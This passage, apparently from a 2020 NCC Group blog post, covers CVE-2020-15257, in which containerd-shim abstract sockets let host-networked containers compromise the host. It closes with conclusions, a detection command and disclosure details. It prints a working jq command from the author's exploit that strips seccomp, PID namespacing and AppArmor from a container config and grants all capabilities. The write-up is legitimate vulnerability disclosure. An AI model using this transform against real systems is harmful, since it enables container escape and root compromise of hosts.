From a privilege escalation perspective, the relevant fields are process.capabilites.(bounding,effective,inheritable,permitted), process.(apparmorProfile,selinuxLabel), mounts, linux.namespaces, and linux.seccomp. From an operational perspective, root.path and process.(args,env) are the important ones, with root.path being the most important for us as. Given that it sets the root of the container filesystem from the perspective of the host, we will need to make sure it will point somewhere useful (i.e. if we plan to run something from an image). If "re-using" an existing container's config.json, such as our own, root.path can be left untouched; but if loading one from our own container, root.path would need to be patched up to reference somewhere in our container's filesystem. As part of my exploit that overwrites my container's config.json file, I use jq to transform its contents (obtained via Stdin) to:

Remove PID namespacing
Disable AppArmor (by setting it to "unconfined")
Disable Seccomp
Add all capabilities

jq '. | del(.linux.seccomp) | del(.linux.namespaces[3]) | (.process.apparmorProfile="unconfined")
      | (.process.capabilities.bounding=["CAP_CHOWN","CAP_DAC_OVERRIDE","CAP_DAC_READ_SEARCH",
          "CAP_FOWNER","CAP_FSETID","CAP_KILL","CAP_SETGID","CAP_SETUID","CAP_SETPCAP",
          "CAP_LINUX_IMMUTABLE","CAP_NET_BIND_SERVICE","CAP_NET_BROADCAST","CAP_NET_ADMIN",
          "CAP_NET_RAW","CAP_IPC_LOCK","CAP_IPC_OWNER","CAP_SYS_MODULE","CAP_SYS_RAWIO",
          "CAP_SYS_CHROOT","CAP_SYS_PTRACE","CAP_SYS_PACCT","CAP_SYS_ADMIN","CAP_SYS_BOOT",
          "CAP_SYS_NICE","CAP_SYS_RESOURCE","CAP_SYS_TIME","CAP_SYS_TTY_CONFIG","CAP_MKNOD",
          "CAP_LEASE","CAP_AUDIT_WRITE","CAP_AUDIT_CONTROL","CAP_SETFCAP","CAP_MAC_OVERRIDE",
          "CAP_MAC_ADMIN","CAP_SYSLOG","CAP_WAKE_ALARM","CAP_BLOCK_SUSPEND","CAP_AUDIT_READ"])
      | (.process.capabilities.effective=.process.capabilities.bounding)
      | (.process.capabilities.inheritable=.process.capabilities.bounding)
      | (.process.capabilities.permitted=.process.capabilities.bounding)'

Conclusions

If an attacker can successfully connect to a containerd-shim socket, they can directly compromise a host. Prior to the patch for CVE-2020-15257 (fixed in containerd 1.3.9 and 1.4.3, with backport patches provided to distros for 1.2.x), host networking on Docker and Kubernetes (when using Docker or containerd CRI) was root-equivalent.
Abstract namespace Unix domain sockets can be extremely dangerous when applied to containerized contexts (especially because containers will often share network namespaces with each other).
It is unclear how the risks of abstract namespace sockets was not taken into account by the core infrastructure responsible for running the majority of the world's containers. It is also unclear how this behavior went unnoticed for so long. If anything, it suggests that containerd has not undergone a proper security assessment.
Writing exploits to abuse containerd-shim was pretty fun. Losing an entire test VM that wasn't fully backed up due to containerd/runc not bothering to unmount everything before rm -rfing the supposed "rootfs" was not fun.

Technical Advisory

Our full technical advisory for this issue is available here.¹⁴

TL;DR For Users

Assuming there are containers running on a host, the following command can be used to quickly determine if a vulnerable version of containerd is in use.

$ cat /proc/net/unix | grep 'containerd-shim' | grep '@'

If this is the case, avoid using host networked containers that run as the real root user.

Code

So as not to immediately impact users who have not yet been able to update to a patched version of containerd and restart their containers, we will wait until January 11th, 2021 to publish the full exploit code demonstrating the attacks described in this post. Users should keep in mind that the content in this post is sufficient to develop a working exploit, and are implored to apply the patches (and restart their containers) immediately if they have not done so already.

Update (1/12/21): Our exploit code for this issue is now available at https://github.com/nccgroup/abstractshimmer.

unspo.nso.red

ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again

10 Dec 2020 - Jeff Dileo // #Linux #Docker #ContainerD #root #vulnerability